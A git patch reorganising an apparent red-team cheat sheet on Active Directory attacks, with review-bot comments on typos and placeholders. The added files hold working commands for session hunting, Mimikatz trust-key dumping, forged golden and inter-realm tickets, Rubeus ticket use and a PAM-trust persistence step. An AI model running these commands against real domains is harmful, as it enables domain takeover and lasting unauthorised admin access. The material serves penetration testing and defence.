From 38068dc5a3fd89cb9e7bdd80cbe576f7be3fba38 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 3 Dec 2023 20:54:06 +0100 Subject: [PATCH] AD - Pages v0.6 --- .../Active Directory Attack.md | 181 ------------------ docs/active-directory/ad-adds-enumerate.md | 27 +++ docs/active-directory/trust-pam.md | 40 ++++ docs/active-directory/trust-relationship.md | 42 ++++ docs/active-directory/trust-sid-hijacking.md | 20 ++ docs/active-directory/trust-ticket.md | 37 ++++ 6 files changed, 166 insertions(+), 181 deletions(-) create mode 100644 docs/active-directory/trust-pam.md create mode 100644 docs/active-directory/trust-relationship.md create mode 100644 docs/active-directory/trust-sid-hijacking.md create mode 100644 docs/active-directory/trust-ticket.md diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md index 8b02cb3..595aad6 100644 --- a/docs/active-directory/Active Directory Attack.md +++ b/docs/active-directory/Active Directory Attack.md @@ -1,17 +1,5 @@ # Active Directory Attacks -## Summary - -- [Active Directory Attacks](#active-directory-attacks) - - [Summary](#summary) - - [Tools](#tools) - - [User Hunting](#user-hunting) - - [Trust relationship between domains](#trust-relationship-between-domains) - - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) - - [Privileged Access Management (PAM) Trust](#privileged-access-management-pam-trust) - - [References](#references) - ## Tools * [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows) 
@@ -99,175 +87,6 @@ ``` -## User Hunting - -Sometimes you need to find a machine where a specific user is logged in. -You can remotely query every machines on the network to get a list of the users's sessions. - -* CrackMapExec - ```ps1 - cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions - SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions - SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator - ``` -* Impacket Smbclient - ```ps1 - $ impacket-smbclient Administrator@10.10.10.10 - # who - host: \\10.10.10.10, user: Administrator, active: 1, idle: 0 - ``` -* PowerView Invoke-UserHunter - ```ps1 - # Find computers were a Domain Admin OR a specified user has a session - Invoke-UserHunter - Invoke-UserHunter -GroupName "RDPUsers" - Invoke-UserHunter -Stealth - ``` - -## Trust relationship between domains - -* One-way - * Domain B trusts A - * Users in Domain A can access resources in Domain B - * Users in Domain B cannot access resources in Domain A -* Two-way - * Domain A trusts Domain B - * Domain B trusts Domain A - * Authentication requests can be passed between the two domains in both directions - -### Enumerate trusts between domains - -* Native `nltest` - ```powershell - nltest /trusted_domains - ``` -* PowerShell `GetAllTrustRelationships` - ```powershell - ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() - - SourceName TargetName TrustType TrustDirection - ---------- ---------- --------- -------------- - domainA.local domainB.local TreeRoot Bidirectional - ``` -* Crackmapexec module `enum_trusts` - ```powershell - cme ldap -u -p -M enum_trusts - ``` - -### Exploit trusts between domains - -:warning: Require a Domain-Admin level access to the current domain. 
- -| Source | Target | Technique to use | Trust relationship | -|---|---|---|---| -| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | -| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | -| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | -| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | - - - -## Child Domain to Forest Compromise - SID Hijacking - -Most trees are linked with dual sided trust relationships to allow for sharing of resources. -By default the first domain created if the Forest Root. - -**Requirements**: -- KRBTGT Hash -- Find the SID of the domain - ```powershell - $ Convert-NameToSid target.domain.com\krbtgt - S-1-5-21-2941561648-383941485-1389968811-502 - - # with Impacket - lookupsid.py domain/user:password@10.10.10.10 - ``` -- Replace 502 with 519 to represent Enterprise Admins -- Create golden ticket and attack parent domain. - ```powershell - kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt - ``` - -## Forest to Forest Compromise - Trust Ticket - -* Require: SID filtering disabled - -From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using -Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**. - -### Dumping trust passwords (trust keys) - -> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts. 
- -```powershell -lsadump::trust /patch - -or find the TRUST_NAME$ machine account hash -``` - -### Create a forged trust ticket (inter-realm TGT) using Mimikatz - -```powershell -mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi -mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi -``` - -### Use the Trust Ticket file to get a ST for the targeted service - -```powershell -.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local -.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt -``` - -Inject the ST file and access the targeted service with the spoofed rights. - -```powershell -kirbikator lsa .\ticket.kirbi -ls \\machine.domain.local\c$ -``` - -## Privileged Access Management (PAM) Trust - -> PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. 
- -Requirements: -* Windows Server 2016 or earlier - -If we compromise the bastion we get `Domain Admins` privileges on the other domain - -* Default configuration for PAM Trust - ```ps1 - # execute on our forest - netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes - netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes - netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes - netdom trust lab.local /domain:bastion.local /Quarantine:No - # execute on our bastion - netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes - ``` -* Enumerate PAM trusts - ```ps1 - # Detect if current forest is PAM trust - Import ADModule - Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} - - # Enumerate shadow security principals - Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl - - # Enumerate if current forest is managed by a bastion forest - # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External - Get-ADTrust -Filter {(ForestTransitive -eq $True)} - ``` -* Compromise - * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...) - * Using SID History -* Persistence - ```ps1 - # Add a compromised user to the group - Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} - ``` - - ## References * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index bf61629..0162863 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md 
@@ -264,6 +264,33 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` + +## User Hunting + +Sometimes you need to find a machine where a specific user is logged in. +You can remotely query every machines on the network to get a list of the users's sessions. + +* CrackMapExec + ```ps1 + cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions + SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions + SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator + ``` +* Impacket Smbclient + ```ps1 + $ impacket-smbclient Administrator@10.10.10.10 + # who + host: \\10.10.10.10, user: Administrator, active: 1, idle: 0 + ``` +* PowerView Invoke-UserHunter + ```ps1 + # Find computers were a Domain Admin OR a specified user has a session + Invoke-UserHunter + Invoke-UserHunter -GroupName "RDPUsers" + Invoke-UserHunter -Stealth + ``` + + ## Other Interesting Commands - **Find Domain Controllers** diff --git a/docs/active-directory/trust-pam.md b/docs/active-directory/trust-pam.md new file mode 100644 index 0000000..8ada2de --- /dev/null +++ b/docs/active-directory/trust-pam.md 
@@ -0,0 +1,40 @@ +# Trust - Privileged Access Management + +> PAM (Privileged Access Management) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. + +Requirements: +* Windows Server 2016 or earlier + +If we compromise the bastion we get `Domain Admins` privileges on the other domain + +* Default configuration for PAM Trust + ```ps1 + # execute on our forest + netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes + netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes + netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes + netdom trust lab.local /domain:bastion.local /Quarantine:No + # execute on our bastion + netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes + ``` +* Enumerate PAM trusts + ```ps1 + # Detect if current forest is PAM trust + Import ADModule + Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} + + # Enumerate shadow security principals + Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl + + # Enumerate if current forest is managed by a bastion forest + # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External + Get-ADTrust -Filter {(ForestTransitive -eq $True)} + ``` +* Compromise + * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...) + * Using SID History +* Persistence + ```ps1 + # Add a compromised user to the group + Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} + ``` \ No newline at end of file 
diff --git a/docs/active-directory/trust-relationship.md b/docs/active-directory/trust-relationship.md new file mode 100644 index 0000000..a0069a2 --- /dev/null +++ b/docs/active-directory/trust-relationship.md @@ -0,0 +1,42 @@ +# Trust - Relationship + +* One-way + * Domain B trusts A + * Users in Domain A can access resources in Domain B + * Users in Domain B cannot access resources in Domain A +* Two-way + * Domain A trusts Domain B + * Domain B trusts Domain A + * Authentication requests can be passed between the two domains in both directions + + +## Enumerate trusts between domains + +* Native `nltest` + ```powershell + nltest /trusted_domains + ``` +* PowerShell `GetAllTrustRelationships` + ```powershell + ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() + + SourceName TargetName TrustType TrustDirection + ---------- ---------- --------- -------------- + domainA.local domainB.local TreeRoot Bidirectional + ``` +* Crackmapexec module `enum_trusts` + ```powershell + cme ldap -u -p -M enum_trusts + ``` + + +## Exploit trusts between domains + +:warning: Require a Domain-Admin level access to the current domain. + +| Source | Target | Technique to use | Trust relationship | +|---|---|---|---| +| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | +| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | +| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | +| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | \ No newline at end of file diff --git a/docs/active-directory/trust-sid-hijacking.md b/docs/active-directory/trust-sid-hijacking.md new file mode 100644 index 0000000..a35162e --- /dev/null +++ b/docs/active-directory/trust-sid-hijacking.md 
@@ -0,0 +1,20 @@ +# Child Domain to Forest Compromise - SID Hijacking + +Most trees are linked with dual sided trust relationships to allow for sharing of resources. +By default the first domain created if the Forest Root. + +**Requirements**: +- KRBTGT Hash +- Find the SID of the domain + ```powershell + $ Convert-NameToSid target.domain.com\krbtgt + S-1-5-21-2941561648-383941485-1389968811-502 + + # with Impacket + lookupsid.py domain/user:password@10.10.10.10 + ``` +- Replace 502 with 519 to represent Enterprise Admins +- Create golden ticket and attack parent domain. + ```powershell + kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt + ``` \ No newline at end of file diff --git a/docs/active-directory/trust-ticket.md b/docs/active-directory/trust-ticket.md new file mode 100644 index 0000000..b7ac42d --- /dev/null +++ b/docs/active-directory/trust-ticket.md 
@@ -0,0 +1,37 @@ +# Forest to Forest Compromise - Trust Ticket + +* Require: SID filtering disabled + +From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using +Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**. + +## Dumping trust passwords (trust keys) + +> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts. + +```powershell +lsadump::trust /patch + +or find the TRUST_NAME$ machine account hash +``` + +## Create a forged trust ticket (inter-realm TGT) using Mimikatz + +```powershell +mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi +mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi +``` + +## Use the Trust Ticket file to get a ST for the targeted service + +```powershell +.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local +.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt +``` + +Inject the ST file and access the targeted service with the spoofed rights. + +```powershell +kirbikator lsa .\ticket.kirbi +ls \\machine.domain.local\c$ +``` \ No newline at end of file
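Review bot: in the first hunk of `Active Directory Attack.md` (@@ -1,17 +1,5 @@), dropping the Summary leaves the page with no link to where the removed sections went (`ad-adds-enumerate.md` for User Hunting, and the four new `trust-*.md` files); add a short list of links to those pages under `# Active Directory Attacks` so readers of the old page can still find the moved content.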
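Review bot: in the second hunk of `Active Directory Attack.md` (@@ -99,175 +87,6 @@), the `## References` section stays behind while the sections it supported (trusts, SID hijacking, trust tickets, PAM) move out, and none of the new `trust-*.md` files gets a References heading; carry the relevant entries (for example the Kerberos explainer) into the new pages or link back to this list so the moved material keeps its sources.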
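Review bot: the `ad-adds-enumerate.md` hunk moves the User Hunting block verbatim and so carries its typos along: "query every machines" should read "query every machine", "the users's sessions" should read "the users' sessions", and the PowerView comment "Find computers were a Domain Admin" should read "Find computers where a Domain Admin". The hunk also leaves two blank lines both before `## User Hunting` and before `## Other Interesting Commands`; a single blank line matches the rest of the file.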
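Review bot: in `trust-pam.md`, `Import ADModule` inside the "Enumerate PAM trusts" block is not a PowerShell command and will fail when copied; the cmdlet is `Import-Module ActiveDirectory`. The requirement "Windows Server 2016 or earlier" reads inverted for a trust type introduced with that release; please confirm and change to "or later". The "Default configuration for PAM Trust" block should say in a comment that `/EnableSIDHistory:Yes` and `/Quarantine:No` are the settings that turn off SID filtering on the trust, since the later "Using SID History" compromise step depends on exactly that, and the `SIDFilteringQuarantined -eq $False` filter in the enumeration block is the indicator a defender should audit for. The file is also missing its trailing newline.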
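Review bot: in `trust-relationship.md`, the line `cme ldap -u -p -M enum_trusts` has nothing after `-u` and `-p`, so it does not run as written; use explicit placeholders such as `cme ldap <ip> -u <user> -p <password> -M enum_trusts`. The last table row "PrinterBug + Unconstrained delegation ?" keeps a stray question mark; either confirm the technique or label the cell "(unverified)" so readers know it is not established. The `## Exploit trusts between domains` table would also benefit from a sentence stating that SID filtering on forest and external trusts is the control that blocks the SID History rows, since that is what the file later lists as a requirement elsewhere. Missing trailing newline at end of file.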
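Review bot: in `trust-sid-hijacking.md`, "By default the first domain created if the Forest Root" should read "is the Forest Root", and "dual sided trust relationships" should be "two-way trust relationships" to match the wording used in `trust-relationship.md`. The placeholders are inconsistent within one procedure: the SID lookup uses `target.domain.com` and `domain/user:password@10.10.10.10`, while the `kerberos::golden` line uses `domain.local` and `S-1-5-SID-SECOND-DOMAIN-519`; use one consistent set of placeholder names so the reader can follow which SID belongs to which domain. It would also help to state why SID filtering is not listed as a requirement here, unlike in `trust-ticket.md` (parent-child trusts inside a forest do not apply SID filtering by default), and the file lacks a trailing newline.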
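Review bot: in `trust-ticket.md`, the line "or find the TRUST_NAME$ machine account hash" sits inside the `powershell` fence under `## Dumping trust passwords (trust keys)` and renders as a command; move it out as prose or prefix it with `#`. The second `kerberos::golden` example embeds a concrete RC4 value and two full SIDs while the first uses `HASH_TRUST$` and `S-1-5-21...` placeholders; replace the literals with the same placeholders so the two lines read as one procedure. The `* Require: SID filtering disabled` bullet would be clearer as a full sentence noting that SID filtering on the forest trust is the control that defeats this, so defenders know which trust attribute to verify. Missing trailing newline at end of file.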